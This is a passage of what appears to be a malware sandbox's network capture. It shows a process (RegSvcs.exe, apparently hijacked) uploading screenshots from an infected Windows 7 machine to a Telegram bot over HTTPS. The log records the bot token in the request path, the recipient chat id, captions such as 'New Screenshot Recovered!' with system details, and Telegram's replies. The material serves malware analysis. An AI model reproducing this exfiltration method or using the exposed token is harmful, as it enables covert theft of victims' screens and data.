73 2f 30 38 32 35 36 Data Ascii: -----------------------------8da1983cfbb680eContent-Disposition: form-data; name="chat_id"5019146869-----------------------------8da1983cfbb680eContent-Disposition: form-data; name="caption"New Screenshot Recovered!User Name: user/08256
2022-04-08 10:14:37 UTC	2020	OUT	Data Raw: 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ec 2e af 8c 4a cf bd 22 8c 36 cd cd 19 7c 91 d7 80 46 07 6a 85 2f a4 96 f0 da 47 77 03 4c 06 e2 05 b3 10 07 ae 77 e3 bd 55 d4 6e 85 b6 97 2b 6d 0e cd 24 aa aa 7b 9f 31 a9 ba 03 c3 81 b5 55 25 b8 db 21 23 f8 b1 d4 7e 1c fe b5 8f 3f bd 63 2e 6d 6c 6b da dd 19 6d 2d 25 75 f9 ae 11 4f cb d0 12 bb bf 2e 29 d7 77 22 d6 1f 30 ae ee 7a 67 1d 89 fe 95 57 4e 39 Data Ascii: 4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?.J"6\|Fj/GwLwUn+m${1U%!#~?c.mlkm-%uO.)w"0zgWN9
2022-04-08 10:14:37 UTC	2036	OUT	Data Raw: da 5b a5 b5 d8 57 44 07 13 3d db 4d 23 12 73 ce 51 7d 7f 41 5a 07 fd 62 9f 63 fd 28 cd 14 80 a1 aa 42 b3 bc 48 e2 6c 00 5b f7 52 04 3c 32 f7 c8 e3 fc fb d6 34 96 f7 12 ea b1 dc 03 2b a5 b6 e0 a8 5c 64 2b 80 31 bb 7f 5f 94 f3 d7 d6 ba 39 ed ad ee 54 0b 88 23 94 0e 40 91 03 63 f3 a8 7f b2 f4 ef f9 f0 b5 ff 00 bf 2b fe 15 49 a1 6a 67 e8 11 18 af af c1 59 01 65 46 fd e4 9b cf 2c e7 ae 4f 15 1a 69 57 43 4c 36 de 58 da 60 2c 53 70 ff 00 5b b7 6e 3e 9d 0f d4 56 d4 16 b6 d6 bb be cf 6f 14 3b be f7 96 81 73 f5 c5 4b 9a 4f 56 35 a1 90 96 13 7f 6c 8b 89 56 62 14 2f 96 e8 63 da a0 2e 0a 9c fc dd 73 d3 8e 6a ac b6 f1 69 da 7d 87 da e0 8b cb 45 6f 36 26 74 52 64 c0 c3 72 40 24 60 8e 0e 79 e2 ba 1c d1 9a 4c 11 cf c1 a7 4f 22 e9 ad 2c 73 f9 71 c0 80 79 7b 33 1b 03 92 4e Data Ascii: [WD=M#sQ}AZbc(BHl[R<24+\d+1_9T#@c+IjgYeF,OiWCL6X`,Sp[n>Vo;sKOV5lVb/c.sji}Eo6&tRdr@$`yLO",sqy{3N
2022-04-08 10:14:37 UTC	2052	OUT	Data Raw: bf 4f f0 a3 69 fe fb 7e 9f e1 40 0f a6 47 f7 4f d4 ff 00 3a 36 9f ef b7 e9 fe 14 d4 53 b7 ef b7 53 e9 eb 40 12 d1 4c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a0 07 d1 4c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a0 07 d1 4c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a0 07 d3 23 fb a7 ea 7f 9d 1b 4f f7 db f4 ff 00 0a 6a 29 db f7 db a9 f4 f5 a0 09 68 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e9 91 fd d3 f5 3f ce 8d a7 fb ed fa 7f 85 35 14 ed fb ed d4 fa 7a d0 04 b4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 c8 fe e9 fa 9f e7 46 d3 fd f6 fd 3f Data Ascii: Oi~@GO:6SS@LQ}OLQ}OLQ}O#Oj)hm?o(Pm?o(Pm?o(P?5zS6m?o(S6m?o(S6m?o(F?
2022-04-08 10:14:37 UTC	2068	OUT	Data Raw: 4d 1b c7 a3 7f df 26 80 1f 4c 8f ee 9f a9 fe 74 6f 1e 8d ff 00 7c 9a 6a 38 0b d1 ba 9f e1 3e b4 01 2d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d3 23 fb a7 ea 7f 9d 1b c7 a3 7f df 26 9a 8e 02 f4 6e a7 f8 4f ad 00 4b 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 c8 fe e9 fa 9f e7 46 f1 e8 df f7 c9 a6 a3 80 bd 1b a9 fe 13 eb 40 12 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 32 3f ba 7e a7 f9 d1 bc 7a 37 fd f2 69 a8 e0 2f 46 ea 7f 84 fa d0 04 b4 53 37 8f 46 ff 00 Data Ascii: M&Lto\|j8>-FL=4o\|}F#&nOKE3xoz7hS7FM&E3xoz7hF@L=4o\|}FL=4o\|}2?~z7i/FS7F
2022-04-08 10:14:37 UTC	2083	OUT	Data Raw: fe e9 fa 9f e7 46 d3 fd f6 fd 3f c2 9a 8a 76 fd f6 ea 7d 3d 68 02 5a 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 64 7f 74 fd 4f f3 a3 69 fe fb 7e 9f e1 4d 45 3b 7e fb 75 3e 9e b4 01 2d 14 cd a7 fb ed fa 7f 85 1b 4f f7 db f4 ff 00 0a 00 7d 14 cd a7 fb ed fa 7f 85 1b 4f f7 db f4 ff 00 0a 00 7d 14 cd a7 fb ed fa 7f 85 1b 4f f7 db f4 ff 00 0a 00 7d 32 3f ba 7e a7 f9 d1 b4 ff 00 7d bf 4f f0 a6 a2 9d bf 7d ba 9f 4f 5a 00 96 8a 66 d3 fd f6 fd 3f c2 8d a7 fb ed fa 7f 85 00 3e 8a 66 d3 fd f6 fd 3f c2 8d a7 fb ed fa 7f 85 00 3e 8a 66 d3 fd f6 fd 3f c2 8d a7 fb ed fa 7f 85 00 3e 99 1f dd 3f 53 fc e8 da 7f be df a7 f8 53 51 4e df be dd 4f a7 ad 00 4b Data Ascii: F?v}=hZ)O6)O6)O6dtOi~ME;~u>-O}O}O}2?~}O}OZf?>f?>f?>?SSQNOK
2022-04-08 10:14:37 UTC	2099	OUT	Data Raw: e4 d1 bc 7a 37 fd f2 68 01 f4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 c8 fe e9 fa 9f e7 46 f1 e8 df f7 c9 a6 a3 80 bd 1b a9 fe 13 eb 40 12 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 32 3f ba 7e a7 f9 d1 bc 7a 37 fd f2 69 a8 e0 2f 46 ea 7f 84 fa d0 04 b4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 4c 8f ee 9f a9 fe 74 6f 1e 8d ff 00 7c 9a 6a 38 0b d1 ba 9f e1 3e b4 01 2d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 Data Ascii: z7hS7FM&E3xoz7hF@L=4o\|}FL=4o\|}2?~z7i/FS7FM&E3xoz7hS7FM&Lto\|j8>-FL=4o\|}F
2022-04-08 10:14:37 UTC	2115	OUT	Data Raw: 45 14 00 53 23 fb a7 ea 7f 9d 3e 99 1f dd 3f 53 fc e8 01 f4 51 45 00 14 51 45 00 14 51 45 00 14 c8 fe e9 fa 9f e7 4f a6 47 f7 4f d4 ff 00 3a 00 7d 14 51 40 05 14 51 40 05 14 51 40 05 32 3f ba 7e a7 f9 d3 e9 91 fd d3 f5 3f ce 80 1f 55 67 ff 00 8f d8 7f eb 9b ff 00 35 ab 55 56 7f f8 fd 87 fe b9 bf f3 5a 00 6b d5 3b 7f f9 08 3f fc 0b f9 47 57 1e a9 db ff 00 c8 41 ff 00 e0 5f ca 3a a1 13 6c 6f f9 ea ff 00 90 ff 00 0a 36 37 fc f5 7f c8 7f 85 67 eb 1e 64 71 99 a3 33 a9 50 0e f5 93 09 1e 0f 25 94 1c b7 1d b0 7a 76 a4 be 2f 15 dc 13 2b 4e aa d2 26 e9 0c 9f bb 0a 78 db b4 1e fe a4 77 eb 48 0d 1d 8d ff 00 3d 5f f2 1f e1 56 6d 14 fd 9c 7c ed f7 9b d3 d4 fb 57 3f 6f 73 2b 5d 24 f3 a3 94 92 e1 a2 42 b3 b0 db 82 40 05 3a 76 eb c9 e6 ba 2b 3f f8 f7 1f ef 37 fe 84 68 e8 Data Ascii: ES#>?SQEQEQEOGO:}Q@Q@Q@2?~?Ug5UVZk;?GWA_:lo67gdq3P%zv/+N&xwH=_Vm\|W?os+]$B@:v+?7h
2022-04-08 10:14:37 UTC	2131	OUT	Data Raw: d4 94 da 23 b9 3f b8 ff 00 81 a7 fe 86 2a 36 fb d2 ff 00 be bf c9 69 6e 0f ee 0f fb e9 ff 00 a1 ad 34 fd e9 7f de 5f e4 b5 e9 1c 05 dd 1c ed d3 94 7f d3 59 bf f4 6b d5 8b b9 0a 59 cc ea 79 58 d8 8f ca aa e9 df 2d 92 0f f6 e4 ff 00 d1 8d 4e be 7c 58 5c 7f d7 26 fe 55 94 96 8c bb e8 37 50 b6 92 44 09 6c ee 8d 17 0a aa c4 64 0e d5 91 79 35 ed e5 c5 ad bc 2c f0 ae dc c9 2a 12 3a 75 27 1e df 99 ad 0d 62 fd ed 62 b8 10 9c 4c e4 a2 11 fc 23 b9 aa 1a 4d cc 96 b6 50 dc 09 3c cd 87 64 9c 11 8f 6f 7e 31 cd 72 49 f2 ca eb e6 64 da b9 78 5e 44 14 2c 79 65 51 80 58 e4 9f af bd 3a 19 37 ea 4a dd 33 6c bf fa 1b d5 b9 a2 b4 bd 89 66 7b 71 28 71 90 f1 70 f8 fe 75 59 2c a3 b6 9a 39 a3 9e 49 16 44 d8 a9 22 e0 a8 04 9f e6 de 95 b4 13 e6 1a 4d 32 e6 ea a9 7a 73 3c 1f ee c9 fc Data Ascii: #?6in4_YkYyX-N\|X\&U7PDldy5,:u'bbL#MP<do~1rIdx^D,yeQX:7J3lf{q(qpuY,9ID"M2zs<
2022-04-08 10:14:37 UTC	2133	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 38 33 63 66 62 62 36 38 30 65 2d 2d 0d 0a Data Ascii: -----------------------------8da1983cfbb680e--
2022-04-08 10:14:37 UTC	2133	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 08 Apr 2022 10:14:37 GMT Content-Type: application/json Content-Length: 833 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":138,"from":{"id":5008280971,"is_bot":true,"first_name":"gods_child_bot","username":"gods_childbot"},"chat":{"id":5019146869,"first_name":"Love","last_name":"Word","username":"tgman1","type":"private"},"date":1649412877,"document":{"file_name":"user-082561 2022-04-08 05-18-34.jpeg","mime_type":"image/jpeg","thumb":{"file_id":"AAMCBAADGQMAA4piUAsNiqdqHmCOkkpjuIFDnvAFWgAC_goAAkCUgFJ0ekD2QT887gEAB20AAyME","file_unique_id":"AQAD_goAAkCUgFJy","file_size":14418,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAOKYlALDYqnah5gjpJKY7iBQ57wBVoAAv4KAAJAlIBSdHpA9kE_PO4jBA","file_unique_id":"AgAD_goAAkCUgFI","file_size":116302},"caption":"New Screenshot Recovered!\n\nUser Name: user/082561\nOSFullName: Microsoft Windows 7 Professional \nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.22	49189	149.154.167.220	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	kBytes transferred	Direction	Data
2022-04-08 10:14:42 UTC	2134	OUT	POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da19869b38ef92 Host: api.telegram.org Content-Length: 116893 Expect: 100-continue Connection: Keep-Alive
2022-04-08 10:14:42 UTC	2135	IN	HTTP/1.1 100 Continue
2022-04-08 10:14:42 UTC	2135	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 38 36 39 62 33 38 65 66 39 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 30 31 39 31 34 36 38 36 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 38 36 39 62 33 38 65 66 39 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 63 72 65 65 6e 73 68 6f 74 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 6c 62 75 73 2f 30 38 32 35 36 Data Ascii: -----------------------------8da19869b38ef92Content-Disposition: form-data; name="chat_id"5019146869-----------------------------8da19869b38ef92Content-Disposition: form-data; name="caption"New Screenshot Recovered!User Name: user/08256
2022-04-08 10:14:42 UTC	2136	OUT	Data Raw: 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ec 2e af 8c 4a cf bd 22 8c 36 cd cd 19 7c 91 d7 80 46 07 6a 85 2f a4 96 f0 da 47 77 03 4c 06 e2 05 b3 10 07 ae 77 e3 bd 55 d4 6e 85 b6 97 2b 6d 0e cd 24 aa aa 7b 9f 31 a9 ba 03 c3 81 b5 55 25 b8 db 21 23 f8 b1 d4 7e 1c fe b5 8f 3f bd 63 2e 6d 6c 6b da dd 19 6d 2d 25 75 f9 ae 11 4f cb d0 12 bb bf 2e 29 d7 77 22 d6 1f 30 ae ee 7a 67 1d 89 fe 95 57 4e 39 Data Ascii: 4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?.J"6\|Fj/GwLwUn+m${1U%!#~?c.mlkm-%uO.)w"0zgWN9
2022-04-08 10:14:42 UTC	2151	OUT	Data Raw: da 5b a5 b5 d8 57 44 07 13 3d db 4d 23 12 73 ce 51 7d 7f 41 5a 07 fd 62 9f 63 fd 28 cd 14 80 a1 aa 42 b3 bc 48 e2 6c 00 5b f7 52 04 3c 32 f7 c8 e3 fc fb d6 34 96 f7 12 ea b1 dc 03 2b a5 b6 e0 a8 5c 64 2b 80 31 bb 7f 5f 94 f3 d7 d6 ba 39 ed ad ee 54 0b 88 23 94 0e 40 91 03 63 f3 a8 7f b2 f4 ef f9 f0 b5 ff 00 bf 2b fe 15 49 a1 6a 67 e8 11 18 af af c1 59 01 65 46 fd e4 9b cf 2c e7 ae 4f 15 1a 69 57 43 4c 36 de 58 da 60 2c 53 70 ff 00 5b b7 6e 3e 9d 0f d4 56 d4 16 b6 d6 bb be cf 6f 14 3b be f7 96 81 73 f5 c5 4b 9a 4f 56 35 a1 90 96 13 7f 6c 8b 89 56 62 14 2f 96 e8 63 da a0 2e 0a 9c fc dd 73 d3 8e 6a ac b6 f1 69 da 7d 87 da e0 8b cb 45 6f 36 26 74 52 64 c0 c3 72 40 24 60 8e 0e 79 e2 ba 1c d1 9a 4c 11 cf c1 a7 4f 22 e9 ad 2c 73 f9 71 c0 80 79 7b 33 1b 03 92 4e Data Ascii: [WD=M#sQ}AZbc(BHl[R<24+\d+1_9T#@c+IjgYeF,OiWCL6X`,Sp[n>Vo;sKOV5lVb/c.sji}Eo6&tRdr@$`yLO",sqy{3N
2022-04-08 10:14:42 UTC	2167	OUT	Data Raw: bf 4f f0 a3 69 fe fb 7e 9f e1 40 0f a6 47 f7 4f d4 ff 00 3a 36 9f ef b7 e9 fe 14 d4 53 b7 ef b7 53 e9 eb 40 12 d1 4c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a0 07 d1 4c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a0 07 d1 4c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a0 07 d3 23 fb a7 ea 7f 9d 1b 4f f7 db f4 ff 00 0a 6a 29 db f7 db a9 f4 f5 a0 09 68 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e9 91 fd d3 f5 3f ce 8d a7 fb ed fa 7f 85 35 14 ed fb ed d4 fa 7a d0 04 b4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 c8 fe e9 fa 9f e7 46 d3 fd f6 fd 3f Data Ascii: Oi~@GO:6SS@LQ}OLQ}OLQ}O#Oj)hm?o(Pm?o(Pm?o(P?5zS6m?o(S6m?o(S6m?o(F?
2022-04-08 10:14:42 UTC	2183	OUT	Data Raw: 4d 1b c7 a3 7f df 26 80 1f 4c 8f ee 9f a9 fe 74 6f 1e 8d ff 00 7c 9a 6a 38 0b d1 ba 9f e1 3e b4 01 2d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d3 23 fb a7 ea 7f 9d 1b c7 a3 7f df 26 9a 8e 02 f4 6e a7 f8 4f ad 00 4b 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 c8 fe e9 fa 9f e7 46 f1 e8 df f7 c9 a6 a3 80 bd 1b a9 fe 13 eb 40 12 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 32 3f ba 7e a7 f9 d1 bc 7a 37 fd f2 69 a8 e0 2f 46 ea 7f 84 fa d0 04 b4 53 37 8f 46 ff 00 Data Ascii: M&Lto\|j8>-FL=4o\|}F#&nOKE3xoz7hS7FM&E3xoz7hF@L=4o\|}FL=4o\|}2?~z7i/FS7F
2022-04-08 10:14:42 UTC	2199	OUT	Data Raw: fe e9 fa 9f e7 46 d3 fd f6 fd 3f c2 9a 8a 76 fd f6 ea 7d 3d 68 02 5a 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 64 7f 74 fd 4f f3 a3 69 fe fb 7e 9f e1 4d 45 3b 7e fb 75 3e 9e b4 01 2d 14 cd a7 fb ed fa 7f 85 1b 4f f7 db f4 ff 00 0a 00 7d 14 cd a7 fb ed fa 7f 85 1b 4f f7 db f4 ff 00 0a 00 7d 14 cd a7 fb ed fa 7f 85 1b 4f f7 db f4 ff 00 0a 00 7d 32 3f ba 7e a7 f9 d1 b4 ff 00 7d bf 4f f0 a6 a2 9d bf 7d ba 9f 4f 5a 00 96 8a 66 d3 fd f6 fd 3f c2 8d a7 fb ed fa 7f 85 00 3e 8a 66 d3 fd f6 fd 3f c2 8d a7 fb ed fa 7f 85 00 3e 8a 66 d3 fd f6 fd 3f c2 8d a7 fb ed fa 7f 85 00 3e 99 1f dd 3f 53 fc e8 da 7f be df a7 f8 53 51 4e df be dd 4f a7 ad 00 4b Data Ascii: F?v}=hZ)O6)O6)O6dtOi~ME;~u>-O}O}O}2?~}O}OZf?>f?>f?>?SSQNOK
2022-04-08 10:14:42 UTC	2214	OUT	Data Raw: e4 d1 bc 7a 37 fd f2 68 01 f4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 c8 fe e9 fa 9f e7 46 f1 e8 df f7 c9 a6 a3 80 bd 1b a9 fe 13 eb 40 12 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 32 3f ba 7e a7 f9 d1 bc 7a 37 fd f2 69 a8 e0 2f 46 ea 7f 84 fa d0 04 b4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 4c 8f ee 9f a9 fe 74 6f 1e 8d ff 00 7c 9a 6a 38 0b d1 ba 9f e1 3e b4 01 2d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 Data Ascii: z7hS7FM&E3xoz7hF@L=4o\|}FL=4o\|}2?~z7i/FS7FM&E3xoz7hS7FM&Lto\|j8>-FL=4o\|}F
2022-04-08 10:14:42 UTC	2230	OUT	Data Raw: 45 14 00 53 23 fb a7 ea 7f 9d 3e 99 1f dd 3f 53 fc e8 01 f4 51 45 00 14 51 45 00 14 51 45 00 14 c8 fe e9 fa 9f e7 4f a6 47 f7 4f d4 ff 00 3a 00 7d 14 51 40 05 14 51 40 05 14 51 40 05 32 3f ba 7e a7 f9 d3 e9 91 fd d3 f5 3f ce 80 1f 55 67 ff 00 8f d8 7f eb 9b ff 00 35 ab 55 56 7f f8 fd 87 fe b9 bf f3 5a 00 6b d5 3b 7f f9 08 3f fc 0b f9 47 57 1e a9 db ff 00 c8 41 ff 00 e0 5f ca 3a a1 13 6c 6f f9 ea ff 00 90 ff 00 0a 36 37 fc f5 7f c8 7f 85 67 eb 1e 64 71 99 a3 33 a9 50 0e f5 93 09 1e 0f 25 94 1c b7 1d b0 7a 76 a4 be 2f 15 dc 13 2b 4e aa d2 26 e9 0c 9f bb 0a 78 db b4 1e fe a4 77 eb 48 0d 1d 8d ff 00 3d 5f f2 1f e1 56 6d 14 fd 9c 7c ed f7 9b d3 d4 fb 57 3f 6f 73 2b 5d 24 f3 a3 94 92 e1 a2 42 b3 b0 db 82 40 05 3a 76 eb c9 e6 ba 2b 3f f8 f7 1f ef 37 fe 84 68 e8 Data Ascii: ES#>?SQEQEQEOGO:}Q@Q@Q@2?~?Ug5UVZk;?GWA_:lo67gdq3P%zv/+N&xwH=_Vm\|W?os+]$B@:v+?7h
2022-04-08 10:14:42 UTC	2246	OUT	Data Raw: d4 94 da 23 b9 3f b8 ff 00 81 a7 fe 86 2a 36 fb d2 ff 00 be bf c9 69 6e 0f ee 0f fb e9 ff 00 a1 ad 34 fd e9 7f de 5f e4 b5 e9 1c 05 dd 1c ed d3 94 7f d3 59 bf f4 6b d5 8b b9 0a 59 cc ea 79 58 d8 8f ca aa e9 df 2d 92 0f f6 e4 ff 00 d1 8d 4e be 7c 58 5c 7f d7 26 fe 55 94 96 8c bb e8 37 50 b6 92 44 09 6c ee 8d 17 0a aa c4 64 0e d5 91 79 35 ed e5 c5 ad bc 2c f0 ae dc c9 2a 12 3a 75 27 1e df 99 ad 0d 62 fd ed 62 b8 10 9c 4c e4 a2 11 fc 23 b9 aa 1a 4d cc 96 b6 50 dc 09 3c cd 87 64 9c 11 8f 6f 7e 31 cd 72 49 f2 ca eb e6 64 da b9 78 5e 44 14 2c 79 65 51 80 58 e4 9f af bd 3a 19 37 ea 4a dd 33 6c bf fa 1b d5 b9 a2 b4 bd 89 66 7b 71 28 71 90 f1 70 f8 fe 75 59 2c a3 b6 9a 39 a3 9e 49 16 44 d8 a9 22 e0 a8 04 9f e6 de 95 b4 13 e6 1a 4d 32 e6 ea a9 7a 73 3c 1f ee c9 fc Data Ascii: #?6in4_YkYyX-N\|X\&U7PDldy5,:u'bbL#MP<do~1rIdx^D,yeQX:7J3lf{q(qpuY,9ID"M2zs<
2022-04-08 10:14:42 UTC	2249	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 38 36 39 62 33 38 65 66 39 32 2d 2d 0d 0a Data Ascii: -----------------------------8da19869b38ef92--
2022-04-08 10:14:42 UTC	2249	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 08 Apr 2022 10:14:42 GMT Content-Type: application/json Content-Length: 833 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":139,"from":{"id":5008280971,"is_bot":true,"first_name":"gods_child_bot","username":"gods_childbot"},"chat":{"id":5019146869,"first_name":"Love","last_name":"Word","username":"tgman1","type":"private"},"date":1649412882,"document":{"file_name":"user-082561 2022-04-08 05-38-34.jpeg","mime_type":"image/jpeg","thumb":{"file_id":"AAMCBAADGQMAA4tiUAsSq-YKSk0U6Vf1xwEdCJ9z6gAC_woAAkCUgFJWTQjKuyVIXgEAB20AAyME","file_unique_id":"AQAD_woAAkCUgFJy","file_size":14417,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAOLYlALEqvmCkpNFOlX9ccBHQifc-oAAv8KAAJAlIBSVk0IyrslSF4jBA","file_unique_id":"AgAD_woAAkCUgFI","file_size":116305},"caption":"New Screenshot Recovered!\n\nUser Name: user/082561\nOSFullName: Microsoft Windows 7 Professional \nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.22	49190	149.154.167.220	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	kBytes transferred	Direction	Data
